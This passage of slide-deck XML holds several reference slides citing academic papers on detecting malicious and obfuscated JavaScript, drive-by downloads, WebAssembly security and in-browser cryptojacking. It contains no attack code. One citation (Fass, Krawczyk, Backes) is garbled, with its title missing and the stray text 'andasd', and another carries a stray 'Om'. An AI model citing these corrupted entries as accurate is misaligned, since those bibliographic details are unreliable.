                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>W. Xu, F. Zhang, and S. Zhu, “The power of obfuscation techniques in malicious javascript code: A measurement study,” in 7th International Conference on Malicious and Unwanted Software, MALWARE 2012, Fajardo, PR, USA, October 16-18, 2012. IEEE Computer Society, 2012, pp. 9–16.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>M. Ceccato, A. Capiluppi, P. Falcarin, and C. Boldyreff, “A Large Study on the Effect of Code Obfuscation on the Quality of Java Code,” Empirical Software Engineering, vol. 20, no. 6, pp. 1486–1524, Dec. 2015</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>M. Hammad, J. Garcia, and S. Malek, “A large-scale empirical study on the effects of code obfuscations on Android apps and anti-malware products,” in Proceedings of the 40th International Conference on Software Engineering. Gothenburg Sweden: ACM, May 2018, pp. 421–431.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P. Wang, D. Wu, Z. Chen, and T. Wei, “Field experience with obfuscating million-user ios apps in large enterprise mobile development,” Software: Practice and Experience, vol. 49, no. 2, pp. 252–273, 2019.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P. Skolka, C. Staicu, and M. Pradel, “Anything to Hide? Studying Minified and Obfuscated Code in the Web,” in The World Wide Web Conference (WWW). ACM, 2019, pp. 1735–1746.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Fass, M. Backes, and B. Stock, “HideNoSeek: Camouflaging Malicious JavaScript in Benign ASTs,” in Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security, CCS 2019, London, UK, November 11-15, 2019, L. Cavallaro, J. Kinder, X. Wang, and J. Katz, Eds. ACM, 2019, pp. 1899–1913.</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7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97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>References (cont.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="Google Shape;926;p7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55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>K. Rieck, T. Krueger, and A. Dewald, “Cujo: efficient detection and prevention of drive-by-download attacks,” in Twenty-Sixth Annual Computer Security Applications Conference, ACSAC 2010, Austin, Texas, USA, 6-10 December 2010, C. Gates, M. Franz, and J. P. McDermott, Eds. ACM, 2010, pp. 31–39</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>M. Cova, C. Krugel, and G. Vigna, “Detection and analysis of drive- ¨ by-download attacks and malicious javascript code,” in Proceedings of the 19th International Conference on World Wide Web, WWW 2010, Raleigh, North Carolina, USA, April 26-30, 2010, M. Rappa, P. Jones, J. Freire, and S. Chakrabarti, Eds. ACM, 2010, pp. 281–290.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>C. Curtsinger, B. Livshits, B. G. Zorn, and C. Seifert, “ZOZZLE: fast and precise in-browser javascript malware detection,” in 20th USENIX Security Symposium, San Francisco, CA, USA, August 8-12, 2011, Proceedings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>D. Canali, M. Cova, G. Vigna, and C. Kruegel, “Prophiler: a fast filter for the large-scale detection of malicious web pages,” in Proceedings of the 20th international conference on World wide web - WWW ’11. Hyderabad, India: ACM Press, 2011, p. 197.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>C. Kolbitsch, B. Livshits, B. Zorn, and C. Seifert, “Rozzle: De-cloaking Internet Malware,” in 2012 IEEE Symposium on Security and Privacy, May 2012, pp. 443–457, iSSN: 2375-1207.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>W. Xu, F. Zhang, and S. Zhu, “JStill: mostly static detection of obfuscated malicious JavaScript code,” in Proceedings of the third ACM conference on Data and application security and privacy - CODASPY ’13. San Antonio, Texas, USA: ACM Press, 2013, p. 117.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Y. Xue, J. Wang, Y. Liu, H. Xiao, J. Sun, and M. Chandramohan, “Detection and classification of malicious JavaScript via attack behavior modelling,” in Proceedings of the 2015 International Symposium on Software Testing and Analysis, ser. ISSTA 2015. New York, NY, USA: Association for Computing Machinery, Jul. 2015, pp. 48–59.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>J. Wang, Y. Xue, Y. Liu, and T. H. Tan, “JSDC: A Hybrid Approach for JavaScript Malware Detection and Classification,” in Proceedings of the 10th ACM Symposium on Information, Computer and Communications Security. Singapore Republic of Singapore: ACM, Apr. 2015, pp. 109–120.</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8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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>References (cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="97222"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="932" name="Google Shape;932;p8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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Y. Wang, W.-d. Cai, and P.-c. Wei, Om“A deep learning approach for detecting malicious JavaScript code: Using a deep learning approach to detect JavaScript-based attacks,” Security and Communication Networks, vol. 9, no. 11, pp. 1520–1534, Jul. 2016</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P. Seshagiri, A. Vazhayil, and P. Sriram, “AMA: Static Code Analysis of Web Page for the Detection of Malicious Scripts,” Procedia Computer Science, vol. 93, pp. 768–773, 2016.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>K. Kim, I. L. Kim, C. H. Kim, Y. Kwon, Y. Zheng, X. Zhang, and D. Xu, “J-Force: Forced Execution on JavaScript,” in Proceedings of the 26th International Conference on World Wide Web, ser. WWW ’17. Republic and Canton of Geneva, CHE: International World Wide Web Conferences Steering Committee, Apr. 2017, pp. 897–906.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Fass, R. P. Krawczyk, M. Backes, andasd, Saclay, France, June 28- 29, 2018, Proceedings, ser. Lecture Notes in Computer Science, C. Giuffrida, S. Bardin, and G. Blanc, Eds., vol. 10885. Springer, 2018, pp. 303–325. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Fass, M. Backes, and B. Stock, “JStap: a static pre-filter for malicious JavaScript detection,” in Proceedings of the 35th Annual Computer Security Applications Conference, ACSAC 2019, San Juan, PR, USA, December 09-13, 2019, D. Balenson, Ed. ACM, 2019, pp. 257–269.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>S. Ndichu, S. Kim, S. Ozawa, T. Misu, and K. Makishima, “A machine learning approach to detection of JavaScript-based attacks using AST features and paragraph vectors,” Applied Soft Computing, vol. 84, p. 105721, Nov. 2019.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>S. Sarker, J. Jueckstock, and A. Kapravelos, “Hiding in Plain Site: Detecting JavaScript Obfuscation through Concealed Browser API Usage,” in IMC ’20: ACM Internet Measurement Conference, Virtual Event, USA, October 27-29, 2020. ACM, 2020, pp. 648–661.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-291465" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>S. Kaplan, B. Livshits, B. Zorn, C. Siefert, and C. Cursinger, “”NOFUS: Automatically Detecting” + String.fromCharCode(32) + ”ObFuSCateD ”.toLowerCase() + ”JavaScript Code”,” Tech. Rep. MSR-TR-2011-57, May 2011.</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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>References (cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Google Shape;938;p8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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I. A. AL-Taharwa, H.-M. Lee, A. B. Jeng, K.-P. Wu, C.-S. Ho, and S.-M. Chen, “JSOD: JavaScript obfuscation detector: JSOD,” Security and Communication Networks, vol. 8, no. 6, pp. 1092–1107, Apr. 2015. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Haas, A. Rossberg, D. L. Schuff, B. L. Titzer, M. Holman, D. Gohman, L. Wagner, A. Zakai, and J. F. Bastien, “Bringing the web up to speed with WebAssembly,” in Proceedings of the 38th ACM SIGPLAN Conference on Programming Language Design and Implementation, PLDI 2017, Barcelona, Spain, June 18-23, 2017, 2017, pp. 185–200. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> R. K. Konoth, E. Vineti, V. Moonsamy, M. Lindorfer, C. Kruegel, H. Bos, and G. Vigna, “Minesweeper: An in-depth look into drive-by cryptocurrency mining and its defense,” in CCS, 2018.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>J. Rüth, T. Zimmermann, K. Wolsing, and O. Hohlfeld, “Digging ¨ into browser-based crypto mining,” in Proceedings of the Internet Measurement Conference 2018, IMC 2018, Boston, MA, USA, October 31 - November 02, 2018. ACM, 2018, pp. 70–76.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>W. Wang, B. Ferrell, X. Xu, K. W. Hamlen, and S. Hao, “Seismic: Secure in-lined script monitors for interrupting cryptojacks,” in European Symposium on Research in Computer Security. Springer, 2018, pp. 122–142.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>W. Fu, R. Lin, and D. Inge, “TaintAssembly: Taint-based information flow control tracking for webassembly,” CoRR, vol. abs/1802.01050, 2018.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Szanto, T. Tamm, and A. Pagnoni, “Taint tracking for webassembly,” CoRR, vol. abs/1807.08349, 2018.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="24"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>M. Musch, C. Wressnegger, M. Johns, and K. Rieck, “New kid on the web: A study on the prevalence of webassembly in the wild,” in DIMVA, 2019.</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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>References (cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944" name="Google Shape;944;p8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0000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317182" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="32"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Kharraz, Z. Ma, P. Murley, C. Lever, J. Mason, A. Miller, N. Borisov, M. Antonakakis, and M. Bailey, “Outguard: Detecting in-browser covert cryptocurrency mining in the wild,” in The World Wide Web Conference, 2019, pp. 840–852. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317182" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="32"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>D. Lehmann and M. Pradel, “Wasabi: A framework for dynamically analyzing WebAssembly,” in ASPLOS, 2019.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317182" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="32"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Romano, Y. Zheng, and W. Wang, “Minerray: Semantics-aware analysis for ever-evolving cryptojacking detection,” in Proceedings of the 35th IEEE/ACM International Conference on Automated Software Engineering, ser. ASE ’20. New York, NY, USA: Association for Computing Machinery, 2020, p. 1129–1140.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317182" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="32"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>D. Lehmann, J. Kinder, and M. Pradel, “Everything Old is New Again: Binary Security of WebAssembly,” in 29th USENIX Security Symposium, USENIX Security 2020, August 12-14, 2020, S. Capkun and F. Roesner, Eds. USENIX Association, 2020, pp. 217–234.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317182" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
